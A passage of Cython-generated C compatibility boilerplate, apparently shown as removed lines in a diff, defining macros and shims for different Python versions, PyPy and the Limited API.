(PY_MAJOR_VERSION < 3 || PY_VERSION_HEX >= 0x03060000 && PY_VERSION_HEX < 0x030C00A6) - #endif - #ifndef CYTHON_METH_FASTCALL - #define CYTHON_METH_FASTCALL (PY_VERSION_HEX >= 0x030700A1) - #endif - #ifndef CYTHON_FAST_PYCALL - #define CYTHON_FAST_PYCALL 1 - #endif - #ifndef CYTHON_PEP487_INIT_SUBCLASS - #define CYTHON_PEP487_INIT_SUBCLASS 1 - #endif - #if PY_VERSION_HEX < 0x03050000 - #undef CYTHON_PEP489_MULTI_PHASE_INIT - #define CYTHON_PEP489_MULTI_PHASE_INIT 0 - #elif !defined(CYTHON_PEP489_MULTI_PHASE_INIT) - #define CYTHON_PEP489_MULTI_PHASE_INIT 1 - #endif - #ifndef CYTHON_USE_MODULE_STATE - #define CYTHON_USE_MODULE_STATE 0 - #endif - #if PY_VERSION_HEX < 0x030400a1 - #undef CYTHON_USE_TP_FINALIZE - #define CYTHON_USE_TP_FINALIZE 0 - #elif !defined(CYTHON_USE_TP_FINALIZE) - #define CYTHON_USE_TP_FINALIZE 1 - #endif - #if PY_VERSION_HEX < 0x030600B1 - #undef CYTHON_USE_DICT_VERSIONS - #define CYTHON_USE_DICT_VERSIONS 0 - #elif !defined(CYTHON_USE_DICT_VERSIONS) - #define CYTHON_USE_DICT_VERSIONS (PY_VERSION_HEX < 0x030C00A5) - #endif - #if PY_VERSION_HEX < 0x030700A3 - #undef CYTHON_USE_EXC_INFO_STACK - #define CYTHON_USE_EXC_INFO_STACK 0 - #elif !defined(CYTHON_USE_EXC_INFO_STACK) - #define CYTHON_USE_EXC_INFO_STACK 1 - #endif - #ifndef CYTHON_UPDATE_DESCRIPTOR_DOC - #define CYTHON_UPDATE_DESCRIPTOR_DOC 1 - #endif -#endif -#if !defined(CYTHON_FAST_PYCCALL) -#define CYTHON_FAST_PYCCALL (CYTHON_FAST_PYCALL && PY_VERSION_HEX >= 0x030600B1) -#endif -#if !defined(CYTHON_VECTORCALL) -#define CYTHON_VECTORCALL (CYTHON_FAST_PYCCALL && PY_VERSION_HEX >= 0x030800B1) -#endif -#define CYTHON_BACKPORT_VECTORCALL (CYTHON_METH_FASTCALL && PY_VERSION_HEX < 0x030800B1) -#if CYTHON_USE_PYLONG_INTERNALS - #if PY_MAJOR_VERSION < 3 - #include "longintrepr.h" - #endif - #undef SHIFT - #undef BASE - #undef MASK - #ifdef SIZEOF_VOID_P - enum { __pyx_check_sizeof_voidp = 1 / (int)(SIZEOF_VOID_P == sizeof(void*)) }; - #endif -#endif -#ifndef __has_attribute - #define 
__has_attribute(x) 0 -#endif -#ifndef __has_cpp_attribute - #define __has_cpp_attribute(x) 0 -#endif -#ifndef CYTHON_RESTRICT - #if defined(__GNUC__) - #define CYTHON_RESTRICT __restrict__ - #elif defined(_MSC_VER) && _MSC_VER >= 1400 - #define CYTHON_RESTRICT __restrict - #elif defined (__STDC_VERSION__) && __STDC_VERSION__ >= 199901L - #define CYTHON_RESTRICT restrict - #else - #define CYTHON_RESTRICT - #endif -#endif -#ifndef CYTHON_UNUSED - #if defined(__cplusplus) - /* for clang __has_cpp_attribute(maybe_unused) is true even before C++17 - * but leads to warnings with -pedantic, since it is a C++17 feature */ - #if ((defined(_MSVC_LANG) && _MSVC_LANG >= 201703L) || __cplusplus >= 201703L) - #if __has_cpp_attribute(maybe_unused) - #define CYTHON_UNUSED [[maybe_unused]] - #endif - #endif - #endif -#endif -#ifndef CYTHON_UNUSED -# if defined(__GNUC__) -# if !(defined(__cplusplus)) || (__GNUC__ > 3 || (__GNUC__ == 3 && __GNUC_MINOR__ >= 4)) -# define CYTHON_UNUSED __attribute__ ((__unused__)) -# else -# define CYTHON_UNUSED -# endif -# elif defined(__ICC) || (defined(__INTEL_COMPILER) && !defined(_MSC_VER)) -# define CYTHON_UNUSED __attribute__ ((__unused__)) -# else -# define CYTHON_UNUSED -# endif -#endif -#ifndef CYTHON_UNUSED_VAR -# if defined(__cplusplus) - template void CYTHON_UNUSED_VAR( const T& ) { } -# else -# define CYTHON_UNUSED_VAR(x) (void)(x) -# endif -#endif -#ifndef CYTHON_MAYBE_UNUSED_VAR - #define CYTHON_MAYBE_UNUSED_VAR(x) CYTHON_UNUSED_VAR(x) -#endif -#ifndef CYTHON_NCP_UNUSED -# if CYTHON_COMPILING_IN_CPYTHON -# define CYTHON_NCP_UNUSED -# else -# define CYTHON_NCP_UNUSED CYTHON_UNUSED -# endif -#endif -#ifndef CYTHON_USE_CPP_STD_MOVE - #if defined(__cplusplus) && (\ - __cplusplus >= 201103L || (defined(_MSC_VER) && _MSC_VER >= 1600)) - #define CYTHON_USE_CPP_STD_MOVE 1 - #else - #define CYTHON_USE_CPP_STD_MOVE 0 - #endif -#endif -#define __Pyx_void_to_None(void_result) ((void)(void_result), Py_INCREF(Py_None), Py_None) -#ifdef _MSC_VER - 
#ifndef _MSC_STDINT_H_ - #if _MSC_VER < 1300 - typedef unsigned char uint8_t; - typedef unsigned short uint16_t; - typedef unsigned int uint32_t; - #else - typedef unsigned __int8 uint8_t; - typedef unsigned __int16 uint16_t; - typedef unsigned __int32 uint32_t; - #endif - #endif - #if _MSC_VER < 1300 - #ifdef _WIN64 - typedef unsigned long long __pyx_uintptr_t; - #else - typedef unsigned int __pyx_uintptr_t; - #endif - #else - #ifdef _WIN64 - typedef unsigned __int64 __pyx_uintptr_t; - #else - typedef unsigned __int32 __pyx_uintptr_t; - #endif - #endif -#else - #include - typedef uintptr_t __pyx_uintptr_t; -#endif -#ifndef CYTHON_FALLTHROUGH - #if defined(__cplusplus) - /* for clang __has_cpp_attribute(fallthrough) is true even before C++17 - * but leads to warnings with -pedantic, since it is a C++17 feature */ - #if ((defined(_MSVC_LANG) && _MSVC_LANG >= 201703L) || __cplusplus >= 201703L) - #if __has_cpp_attribute(fallthrough) - #define CYTHON_FALLTHROUGH [[fallthrough]] - #endif - #endif - #ifndef CYTHON_FALLTHROUGH - #if __has_cpp_attribute(clang::fallthrough) - #define CYTHON_FALLTHROUGH [[clang::fallthrough]] - #elif __has_cpp_attribute(gnu::fallthrough) - #define CYTHON_FALLTHROUGH [[gnu::fallthrough]] - #endif - #endif - #endif - #ifndef CYTHON_FALLTHROUGH - #if __has_attribute(fallthrough) - #define CYTHON_FALLTHROUGH __attribute__((fallthrough)) - #else - #define CYTHON_FALLTHROUGH - #endif - #endif - #if defined(__clang__) && defined(__apple_build_version__) - #if __apple_build_version__ < 7000000 - #undef CYTHON_FALLTHROUGH - #define CYTHON_FALLTHROUGH - #endif - #endif -#endif -#ifdef __cplusplus - template - struct __PYX_IS_UNSIGNED_IMPL {static const bool value = T(0) < T(-1);}; - #define __PYX_IS_UNSIGNED(type) (__PYX_IS_UNSIGNED_IMPL::value) -#else - #define __PYX_IS_UNSIGNED(type) (((type)-1) > 0) -#endif -#if CYTHON_COMPILING_IN_PYPY == 1 - #define __PYX_NEED_TP_PRINT_SLOT (PY_VERSION_HEX >= 0x030800b4 && PY_VERSION_HEX < 0x030A0000) -#else - 
#define __PYX_NEED_TP_PRINT_SLOT (PY_VERSION_HEX >= 0x030800b4 && PY_VERSION_HEX < 0x03090000) -#endif -#define __PYX_REINTERPRET_FUNCION(func_pointer, other_pointer) ((func_pointer)(void(*)(void))(other_pointer)) - -#ifndef CYTHON_INLINE - #if defined(__clang__) - #define CYTHON_INLINE __inline__ __attribute__ ((__unused__)) - #elif defined(__GNUC__) - #define CYTHON_INLINE __inline__ - #elif defined(_MSC_VER) - #define CYTHON_INLINE __inline - #elif defined (__STDC_VERSION__) && __STDC_VERSION__ >= 199901L - #define CYTHON_INLINE inline - #else - #define CYTHON_INLINE - #endif -#endif - -#define __PYX_BUILD_PY_SSIZE_T "n" -#define CYTHON_FORMAT_SSIZE_T "z" -#if PY_MAJOR_VERSION < 3 - #define __Pyx_BUILTIN_MODULE_NAME "__builtin__" - #define __Pyx_DefaultClassType PyClass_Type - #define __Pyx_PyCode_New(a, p, k, l, s, f, code, c, n, v, fv, cell, fn, name, fline, lnos)\ - PyCode_New(a+k, l, s, f, code, c, n, v, fv, cell, fn, name, fline, lnos) -#else - #define __Pyx_BUILTIN_MODULE_NAME "builtins" - #define __Pyx_DefaultClassType PyType_Type -#if CYTHON_COMPILING_IN_LIMITED_API - static CYTHON_INLINE PyObject* __Pyx_PyCode_New(int a, int p, int k, int l, int s, int f, - PyObject *code, PyObject *c, PyObject* n, PyObject *v, - PyObject *fv, PyObject *cell, PyObject* fn, - PyObject *name, int fline, PyObject *lnos) { - PyObject *exception_table = NULL; - PyObject *types_module=NULL, *code_type=NULL, *result=NULL; - #if __PYX_LIMITED_VERSION_HEX < 0x030B0000 - PyObject *version_info; // borrowed - #endif - PyObject *py_minor_version = NULL; - long minor_version = 0; - PyObject *type, *value, *traceback; - PyErr_Fetch(&type, &value, &traceback); - #if __PYX_LIMITED_VERSION_HEX >= 0x030B0000 - minor_version = 11; // we don't yet need to distinguish between versions > 11 - #else - if (!(version_info = PySys_GetObject("version_info"))) goto end; - if (!(py_minor_version = PySequence_GetItem(version_info, 1))) goto end; - minor_version = PyLong_AsLong(py_minor_version); - 
if (minor_version == -1 && PyErr_Occurred()) goto end; - #endif - if (!(types_module = PyImport_ImportModule("types"))) goto end; - if (!(code_type = PyObject_GetAttrString(types_module, "CodeType"))) goto end; - if (minor_version <= 7) { - (void)p; - result = PyObject_CallFunction(code_type, "iiiiiOOOOOOiOO", a, k, l, s, f, code, - c, n, v, fn, name, fline, lnos, fv, cell); - } else if (minor_version <= 10) { - result = PyObject_CallFunction(code_type, "iiiiiiOOOOOOiOO", a,p, k, l, s, f, code, - c, n, v, fn, name, fline, lnos, fv, cell); - } else { - if (!(exception_table = PyBytes_FromStringAndSize(NULL, 0))) goto end; - result = PyObject_CallFunction(code_type, "iiiiiiOOOOOOOiOO", a,p, k, l, s, f, code, - c, n, v, fn, name, name, fline, lnos, exception_table, fv, cell); - } - end: - Py_XDECREF(code_type); - Py_XDECREF(exception_table); - Py_XDECREF(types_module); - Py_XDECREF(py_minor_version); - if (type) { - PyErr_Restore(type, value, traceback); - } - return result; - } - #ifndef CO_OPTIMIZED - #define CO_OPTIMIZED 0x0001 - #endif - #ifndef CO_NEWLOCALS - #define CO_NEWLOCALS 0x0002 - #endif - #ifndef CO_VARARGS - #define CO_VARARGS 0x0004 - #endif - #ifndef CO_VARKEYWORDS - #define CO_VARKEYWORDS 0x0008 - #endif - #ifndef CO_ASYNC_GENERATOR - #define CO_ASYNC_GENERATOR 0x0200 - #endif - #ifndef CO_GENERATOR - #define CO_GENERATOR 0x0020 - #endif - #ifndef CO_COROUTINE - #define CO_COROUTINE 0x0080 - #endif -#elif PY_VERSION_HEX >= 0x030B0000 - static CYTHON_INLINE PyCodeObject* __Pyx_PyCode_New(int a, int p, int k, int l, int s, int f, - PyObject *code, PyObject *c, PyObject* n, PyObject *v, - PyObject *fv, PyObject *cell, PyObject* fn, - PyObject *name, int fline, PyObject *lnos) { - PyCodeObject *result; - PyObject *empty_bytes = PyBytes_FromStringAndSize("", 0); // we don't have access to __pyx_empty_bytes here - if (!empty_bytes) return NULL; - result = - #if PY_VERSION_HEX >= 0x030C0000 - PyUnstable_Code_NewWithPosOnlyArgs - #else - 
PyCode_NewWithPosOnlyArgs - #endif - (a, p, k, l, s, f, code, c, n, v, fv, cell, fn, name, name, fline, lnos, empty_bytes); - Py_DECREF(empty_bytes); - return result; - } -#elif PY_VERSION_HEX >= 0x030800B2 && !CYTHON_COMPILING_IN_PYPY - #define __Pyx_PyCode_New(a, p, k, l, s, f, code, c, n, v, fv, cell, fn, name, fline, lnos)\ - PyCode_NewWithPosOnlyArgs(a, p, k, l, s, f, code, c, n, v, fv, cell, fn, name, fline, lnos) -#else - #define __Pyx_PyCode_New(a, p, k, l, s, f, code, c, n, v, fv, cell, fn, name, fline, lnos)\ - PyCode_New(a, k, l, s, f, code, c, n, v, fv, cell, fn, name, fline, lnos) -#endif -#endif -#if PY_VERSION_HEX >= 0x030900A4 || defined(Py_IS_TYPE) - #define __Pyx_IS_TYPE(ob, type) Py_IS_TYPE(ob, type) -#else - #define __Pyx_IS_TYPE(ob, type) (((const PyObject*)ob)->ob_type == (type)) -#endif -#if PY_VERSION_HEX >= 0x030A00B1 || defined(Py_Is) - #define __Pyx_Py_Is(x, y) Py_Is(x, y) -#else - #define __Pyx_Py_Is(x, y) ((x) == (y)) -#endif -#if PY_VERSION_HEX >= 0x030A00B1 || defined(Py_IsNone) - #define __Pyx_Py_IsNone(ob) Py_IsNone(ob) -#else - #define __Pyx_Py_IsNone(ob) __Pyx_Py_Is((ob), Py_None) -#endif -#if PY_VERSION_HEX >= 0x030A00B1 || defined(Py_IsTrue) - #define __Pyx_Py_IsTrue(ob) Py_IsTrue(ob) -#else - #define __Pyx_Py_IsTrue(ob) __Pyx_Py_Is((ob), Py_True) -#endif -#if PY_VERSION_HEX >= 0x030A00B1 || defined(Py_IsFalse) - #define __Pyx_Py_IsFalse(ob) Py_IsFalse(ob) -#else - #define __Pyx_Py_IsFalse(ob) __Pyx_Py_Is((ob), Py_False) -#endif -#define __Pyx_NoneAsNull(obj) (__Pyx_Py_IsNone(obj) ? 
NULL : (obj)) -#if PY_VERSION_HEX >= 0x030900F0 && !CYTHON_COMPILING_IN_PYPY - #define __Pyx_PyObject_GC_IsFinalized(o) PyObject_GC_IsFinalized(o) -#else - #define __Pyx_PyObject_GC_IsFinalized(o) _PyGC_FINALIZED(o) -#endif -#ifndef CO_COROUTINE - #define CO_COROUTINE 0x80 -#endif -#ifndef CO_ASYNC_GENERATOR - #define CO_ASYNC_GENERATOR 0x200 -#endif -#ifndef Py_TPFLAGS_CHECKTYPES - #define Py_TPFLAGS_CHECKTYPES 0 -#endif -#ifndef Py_TPFLAGS_HAVE_INDEX - #define Py_TPFLAGS_HAVE_INDEX 0 -#endif -#ifndef Py_TPFLAGS_HAVE_NEWBUFFER - #define Py_TPFLAGS_HAVE_NEWBUFFER 0 -#endif -#ifndef Py_TPFLAGS_HAVE_FINALIZE - #define Py_TPFLAGS_HAVE_FINALIZE 0 -#endif -#ifndef Py_TPFLAGS_SEQUENCE - #define Py_TPFLAGS_SEQUENCE 0 -#endif -#ifndef Py_TPFLAGS_MAPPING - #define Py_TPFLAGS_MAPPING 0 -#endif -#ifndef METH_STACKLESS - #define METH_STACKLESS 0 -#endif -#if PY_VERSION_HEX <= 0x030700A3 || !defined(METH_FASTCALL) - #ifndef METH_FASTCALL - #define METH_FASTCALL 0x80 - #endif - typedef PyObject *(*__Pyx_PyCFunctionFast) (PyObject *self, PyObject *const *args, Py_ssize_t nargs); - typedef PyObject *(*__Pyx_PyCFunctionFastWithKeywords) (PyObject *self, PyObject *const *args, - Py_ssize_t nargs, PyObject *kwnames); -#else - #define __Pyx_PyCFunctionFast _PyCFunctionFast - #define __Pyx_PyCFunctionFastWithKeywords _PyCFunctionFastWithKeywords -#endif -#if CYTHON_METH_FASTCALL - #define __Pyx_METH_FASTCALL METH_FASTCALL - #define __Pyx_PyCFunction_FastCall __Pyx_PyCFunctionFast - #define __Pyx_PyCFunction_FastCallWithKeywords __Pyx_PyCFunctionFastWithKeywords -#else - #define __Pyx_METH_FASTCALL METH_VARARGS - #define __Pyx_PyCFunction_FastCall PyCFunction - #define __Pyx_PyCFunction_FastCallWithKeywords PyCFunctionWithKeywords -#endif -#if CYTHON_VECTORCALL - #define __pyx_vectorcallfunc vectorcallfunc - #define __Pyx_PY_VECTORCALL_ARGUMENTS_OFFSET PY_VECTORCALL_ARGUMENTS_OFFSET - #define __Pyx_PyVectorcall_NARGS(n) PyVectorcall_NARGS((size_t)(n)) -#elif CYTHON_BACKPORT_VECTORCALL - 
typedef PyObject *(*__pyx_vectorcallfunc)(PyObject *callable, PyObject *const *args, - size_t nargsf, PyObject *kwnames); - #define __Pyx_PY_VECTORCALL_ARGUMENTS_OFFSET ((size_t)1 << (8 * sizeof(size_t) - 1)) - #define __Pyx_PyVectorcall_NARGS(n) ((Py_ssize_t)(((size_t)(n)) & ~__Pyx_PY_VECTORCALL_ARGUMENTS_OFFSET)) -#else - #define __Pyx_PY_VECTORCALL_ARGUMENTS_OFFSET 0 - #define __Pyx_PyVectorcall_NARGS(n) ((Py_ssize_t)(n)) -#endif -#if PY_VERSION_HEX >= 0x030900B1 -#define __Pyx_PyCFunction_CheckExact(func) PyCFunction_CheckExact(func) -#else -#define __Pyx_PyCFunction_CheckExact(func) PyCFunction_Check(func) -#endif -#define __Pyx_CyOrPyCFunction_Check(func) PyCFunction_Check(func) -#if CYTHON_COMPILING_IN_CPYTHON -#define __Pyx_CyOrPyCFunction_GET_FUNCTION(func) (((PyCFunctionObject*)(func))->m_ml->ml_meth) -#elif !CYTHON_COMPILING_IN_LIMITED_API -#define __Pyx_CyOrPyCFunction_GET_FUNCTION(func) PyCFunction_GET_FUNCTION(func) -#endif -#if CYTHON_COMPILING_IN_CPYTHON -#define __Pyx_CyOrPyCFunction_GET_FLAGS(func) (((PyCFunctionObject*)(func))->m_ml->ml_flags) -static CYTHON_INLINE PyObject* __Pyx_CyOrPyCFunction_GET_SELF(PyObject *func) { - return (__Pyx_CyOrPyCFunction_GET_FLAGS(func) & METH_STATIC) ?
NULL : ((PyCFunctionObject*)func)->m_self; -} -#endif -static CYTHON_INLINE int __Pyx__IsSameCFunction(PyObject *func, void *cfunc) { -#if CYTHON_COMPILING_IN_LIMITED_API - return PyCFunction_Check(func) && PyCFunction_GetFunction(func) == (PyCFunction) cfunc; -#else - return PyCFunction_Check(func) && PyCFunction_GET_FUNCTION(func) == (PyCFunction) cfunc; -#endif -} -#define __Pyx_IsSameCFunction(func, cfunc) __Pyx__IsSameCFunction(func, cfunc) -#if __PYX_LIMITED_VERSION_HEX < 0x030900B1 - #define __Pyx_PyType_FromModuleAndSpec(m, s, b) ((void)m, PyType_FromSpecWithBases(s, b)) - typedef PyObject *(*__Pyx_PyCMethod)(PyObject *, PyTypeObject *, PyObject *const *, size_t, PyObject *); -#else - #define __Pyx_PyType_FromModuleAndSpec(m, s, b) PyType_FromModuleAndSpec(m, s, b) - #define __Pyx_PyCMethod PyCMethod -#endif -#ifndef METH_METHOD - #define METH_METHOD 0x200 -#endif -#if CYTHON_COMPILING_IN_PYPY && !defined(PyObject_Malloc) - #define PyObject_Malloc(s) PyMem_Malloc(s) - #define PyObject_Free(p) PyMem_Free(p) - #define PyObject_Realloc(p) PyMem_Realloc(p) -#endif -#if CYTHON_COMPILING_IN_LIMITED_API - #define __Pyx_PyCode_HasFreeVars(co) (PyCode_GetNumFree(co) > 0) - #define __Pyx_PyFrame_SetLineNumber(frame, lineno) -#else - #define __Pyx_PyCode_HasFreeVars(co) (PyCode_GetNumFree(co) > 0) - #define __Pyx_PyFrame_SetLineNumber(frame, lineno) (frame)->f_lineno = (lineno) -#endif -#if CYTHON_COMPILING_IN_LIMITED_API - #define __Pyx_PyThreadState_Current PyThreadState_Get() -#elif !CYTHON_FAST_THREAD_STATE - #define __Pyx_PyThreadState_Current PyThreadState_GET() -#elif PY_VERSION_HEX >= 0x03060000 - #define __Pyx_PyThreadState_Current _PyThreadState_UncheckedGet() -#elif PY_VERSION_HEX >= 0x03000000 - #define __Pyx_PyThreadState_Current PyThreadState_GET() -#else - #define __Pyx_PyThreadState_Current _PyThreadState_Current -#endif -#if CYTHON_COMPILING_IN_LIMITED_API -static CYTHON_INLINE void *__Pyx_PyModule_GetState(PyObject *op) -{ - void *result; - result = 
PyModule_GetState(op); - if (!result) - Py_FatalError("Couldn't find the module state"); - return result; -} -#endif -#define __Pyx_PyObject_GetSlot(obj, name, func_ctype) __Pyx_PyType_GetSlot(Py_TYPE(obj), name, func_ctype) -#if CYTHON_COMPILING_IN_LIMITED_API - #define __Pyx_PyType_GetSlot(type, name, func_ctype) ((func_ctype) PyType_GetSlot((type), Py_##name)) -#else - #define __Pyx_PyType_GetSlot(type, name, func_ctype) ((type)->name) -#endif -#if PY_VERSION_HEX < 0x030700A2 && !defined(PyThread_tss_create) && !defined(Py_tss_NEEDS_INIT) -#include "pythread.h" -#define Py_tss_NEEDS_INIT 0 -typedef int Py_tss_t; -static CYTHON_INLINE int PyThread_tss_create(Py_tss_t *key) { - *key = PyThread_create_key(); - return 0; -} -static CYTHON_INLINE Py_tss_t * PyThread_tss_alloc(void) { - Py_tss_t *key = (Py_tss_t *)PyObject_Malloc(sizeof(Py_tss_t)); - *key = Py_tss_NEEDS_INIT; - return key; -} -static CYTHON_INLINE void PyThread_tss_free(Py_tss_t *key) { - PyObject_Free(key); -} -static CYTHON_INLINE int PyThread_tss_is_created(Py_tss_t *key) { - return *key != Py_tss_NEEDS_INIT; -} -static CYTHON_INLINE void PyThread_tss_delete(Py_tss_t *key) { - PyThread_delete_key(*key); - *key = Py_tss_NEEDS_INIT; -} -static CYTHON_INLINE int PyThread_tss_set(Py_tss_t *key, void *value) { - return PyThread_set_key_value(*key, value); -} -static CYTHON_INLINE void * PyThread_tss_get(Py_tss_t *key) { - return PyThread_get_key_value(*key); -} -#endif -#if PY_MAJOR_VERSION < 3 - #if CYTHON_COMPILING_IN_PYPY - #if PYPY_VERSION_NUM < 0x07030600 - #if defined(__cplusplus) && __cplusplus >= 201402L - [[deprecated("`with nogil:` inside a nogil function will not release the GIL in PyPy2 < 7.3.6")]] - #elif defined(__GNUC__) || defined(__clang__) - __attribute__ ((__deprecated__("`with nogil:` inside a nogil function will not release the GIL in PyPy2 < 7.3.6"))) - #elif defined(_MSC_VER) - __declspec(deprecated("`with nogil:` inside a nogil function will not release the GIL in PyPy2 < 
7.3.6")) - #endif - static CYTHON_INLINE int PyGILState_Check(void) { - return 0; - } - #else // PYPY_VERSION_NUM < 0x07030600 - #endif // PYPY_VERSION_NUM < 0x07030600 - #else - static CYTHON_INLINE int PyGILState_Check(void) { - PyThreadState * tstate = _PyThreadState_Current; - return tstate && (tstate == PyGILState_GetThisThreadState()); - } - #endif -#endif -#if CYTHON_COMPILING_IN_CPYTHON || defined(_PyDict_NewPresized) -#define __Pyx_PyDict_NewPresized(n) ((n <= 8) ? PyDict_New() : _PyDict_NewPresized(n)) -#else -#define __Pyx_PyDict_NewPresized(n) PyDict_New() -#endif -#if PY_MAJOR_VERSION >= 3 || CYTHON_FUTURE_DIVISION - #define __Pyx_PyNumber_Divide(x,y) PyNumber_TrueDivide(x,y) - #define __Pyx_PyNumber_InPlaceDivide(x,y) PyNumber_InPlaceTrueDivide(x,y) -#else - #define __Pyx_PyNumber_Divide(x,y) PyNumber_Divide(x,y) - #define __Pyx_PyNumber_InPlaceDivide(x,y) PyNumber_InPlaceDivide(x,y) -#endif -#if CYTHON_COMPILING_IN_CPYTHON && PY_VERSION_HEX > 0x030600B4 && CYTHON_USE_UNICODE_INTERNALS -#define __Pyx_PyDict_GetItemStrWithError(dict, name) _PyDict_GetItem_KnownHash(dict, name, ((PyASCIIObject *) name)->hash) -static CYTHON_INLINE PyObject * __Pyx_PyDict_GetItemStr(PyObject *dict, PyObject *name) { - PyObject *res = __Pyx_PyDict_GetItemStrWithError(dict, name); - if (res == NULL) PyErr_Clear(); - return res; -} -#elif PY_MAJOR_VERSION >= 3 && (!CYTHON_COMPILING_IN_PYPY || PYPY_VERSION_NUM >= 0x07020000) -#define __Pyx_PyDict_GetItemStrWithError PyDict_GetItemWithError -#define __Pyx_PyDict_GetItemStr PyDict_GetItem -#else -static CYTHON_INLINE PyObject * __Pyx_PyDict_GetItemStrWithError(PyObject *dict, PyObject *name) { -#if CYTHON_COMPILING_IN_PYPY - return PyDict_GetItem(dict, name); -#else - PyDictEntry *ep; - PyDictObject *mp = (PyDictObject*) dict; - long hash = ((PyStringObject *) name)->ob_shash; - assert(hash != -1); - ep = (mp->ma_lookup)(mp, name, hash); - if (ep == NULL) { - return NULL; - } - return ep->me_value; -#endif -} -#define 
__Pyx_PyDict_GetItemStr PyDict_GetItem -#endif -#if CYTHON_USE_TYPE_SLOTS - #define __Pyx_PyType_GetFlags(tp) (((PyTypeObject *)tp)->tp_flags) - #define __Pyx_PyType_HasFeature(type, feature) ((__Pyx_PyType_GetFlags(type) & (feature)) != 0) - #define __Pyx_PyObject_GetIterNextFunc(obj) (Py_TYPE(obj)->tp_iternext) -#else - #define __Pyx_PyType_GetFlags(tp) (PyType_GetFlags((PyTypeObject *)tp)) - #define __Pyx_PyType_HasFeature(type, feature) PyType_HasFeature(type, feature) - #define __Pyx_PyObject_GetIterNextFunc(obj) PyIter_Next -#endif -#if CYTHON_COMPILING_IN_LIMITED_API - #define __Pyx_SetItemOnTypeDict(tp, k, v) PyObject_GenericSetAttr((PyObject*)tp, k, v) -#else - #define __Pyx_SetItemOnTypeDict(tp, k, v) PyDict_SetItem(tp->tp_dict, k, v) -#endif -#if CYTHON_USE_TYPE_SPECS && PY_VERSION_HEX >= 0x03080000 -#define __Pyx_PyHeapTypeObject_GC_Del(obj) {\ - PyTypeObject *type = Py_TYPE(obj);\ - assert(__Pyx_PyType_HasFeature(type, Py_TPFLAGS_HEAPTYPE));\ - PyObject_GC_Del(obj);\ - Py_DECREF(type);\ -} -#else -#define __Pyx_PyHeapTypeObject_GC_Del(obj) PyObject_GC_Del(obj) -#endif -#if CYTHON_COMPILING_IN_LIMITED_API - #define CYTHON_PEP393_ENABLED 1 - #define __Pyx_PyUnicode_READY(op) (0) - #define __Pyx_PyUnicode_GET_LENGTH(u) PyUnicode_GetLength(u) - #define __Pyx_PyUnicode_READ_CHAR(u, i) PyUnicode_ReadChar(u, i) - #define __Pyx_PyUnicode_MAX_CHAR_VALUE(u) ((void)u, 1114111U) - #define __Pyx_PyUnicode_KIND(u) ((void)u, (0)) - #define __Pyx_PyUnicode_DATA(u) ((void*)u) - #define __Pyx_PyUnicode_READ(k, d, i) ((void)k, PyUnicode_ReadChar((PyObject*)(d), i)) - #define __Pyx_PyUnicode_IS_TRUE(u) (0 != PyUnicode_GetLength(u)) -#elif PY_VERSION_HEX > 0x03030000 && defined(PyUnicode_KIND) - #define CYTHON_PEP393_ENABLED 1 - #if PY_VERSION_HEX >= 0x030C0000 - #define __Pyx_PyUnicode_READY(op) (0) - #else - #define __Pyx_PyUnicode_READY(op) (likely(PyUnicode_IS_READY(op)) ?\ - 0 : _PyUnicode_Ready((PyObject *)(op))) - #endif - #define __Pyx_PyUnicode_GET_LENGTH(u) 
PyUnicode_GET_LENGTH(u) - #define __Pyx_PyUnicode_READ_CHAR(u, i) PyUnicode_READ_CHAR(u, i) - #define __Pyx_PyUnicode_MAX_CHAR_VALUE(u) PyUnicode_MAX_CHAR_VALUE(u) - #define __Pyx_PyUnicode_KIND(u) ((int)PyUnicode_KIND(u)) - #define __Pyx_PyUnicode_DATA(u) PyUnicode_DATA(u) - #define __Pyx_PyUnicode_READ(k, d, i) PyUnicode_READ(k, d, i) - #define __Pyx_PyUnicode_WRITE(k, d, i, ch) PyUnicode_WRITE(k, d, i, (Py_UCS4) ch) - #if PY_VERSION_HEX >= 0x030C0000 - #define __Pyx_PyUnicode_IS_TRUE(u) (0 != PyUnicode_GET_LENGTH(u)) - #else - #if CYTHON_COMPILING_IN_CPYTHON && PY_VERSION_HEX >= 0x03090000 - #define __Pyx_PyUnicode_IS_TRUE(u) (0 != (likely(PyUnicode_IS_READY(u)) ? PyUnicode_GET_LENGTH(u) : ((PyCompactUnicodeObject *)(u))->wstr_length)) - #else - #define __Pyx_PyUnicode_IS_TRUE(u) (0 != (likely(PyUnicode_IS_READY(u)) ? PyUnicode_GET_LENGTH(u) : PyUnicode_GET_SIZE(u))) - #endif - #endif -#else - #define CYTHON_PEP393_ENABLED 0 - #define PyUnicode_1BYTE_KIND 1 - #define PyUnicode_2BYTE_KIND 2 - #define PyUnicode_4BYTE_KIND 4 - #define __Pyx_PyUnicode_READY(op) (0) - #define __Pyx_PyUnicode_GET_LENGTH(u) PyUnicode_GET_SIZE(u) - #define __Pyx_PyUnicode_READ_CHAR(u, i) ((Py_UCS4)(PyUnicode_AS_UNICODE(u)[i])) - #define __Pyx_PyUnicode_MAX_CHAR_VALUE(u) ((sizeof(Py_UNICODE) == 2) ? 
65535U : 1114111U) - #define __Pyx_PyUnicode_KIND(u) ((int)sizeof(Py_UNICODE)) - #define __Pyx_PyUnicode_DATA(u) ((void*)PyUnicode_AS_UNICODE(u)) - #define __Pyx_PyUnicode_READ(k, d, i) ((void)(k), (Py_UCS4)(((Py_UNICODE*)d)[i])) - #define __Pyx_PyUnicode_WRITE(k, d, i, ch) (((void)(k)), ((Py_UNICODE*)d)[i] = (Py_UNICODE) ch) - #define __Pyx_PyUnicode_IS_TRUE(u) (0 != PyUnicode_GET_SIZE(u)) -#endif -#if CYTHON_COMPILING_IN_PYPY - #define __Pyx_PyUnicode_Concat(a, b) PyNumber_Add(a, b) - #define __Pyx_PyUnicode_ConcatSafe(a, b) PyNumber_Add(a, b) -#else - #define __Pyx_PyUnicode_Concat(a, b) PyUnicode_Concat(a, b) - #define __Pyx_PyUnicode_ConcatSafe(a, b) ((unlikely((a) == Py_None) || unlikely((b) == Py_None)) ?\ - PyNumber_Add(a, b) : __Pyx_PyUnicode_Concat(a, b)) -#endif -#if CYTHON_COMPILING_IN_PYPY - #if !defined(PyUnicode_DecodeUnicodeEscape) - #define PyUnicode_DecodeUnicodeEscape(s, size, errors) PyUnicode_Decode(s, size, "unicode_escape", errors) - #endif - #if !defined(PyUnicode_Contains) || (PY_MAJOR_VERSION == 2 && PYPY_VERSION_NUM < 0x07030500) - #undef PyUnicode_Contains - #define PyUnicode_Contains(u, s) PySequence_Contains(u, s) - #endif - #if !defined(PyByteArray_Check) - #define PyByteArray_Check(obj) PyObject_TypeCheck(obj, 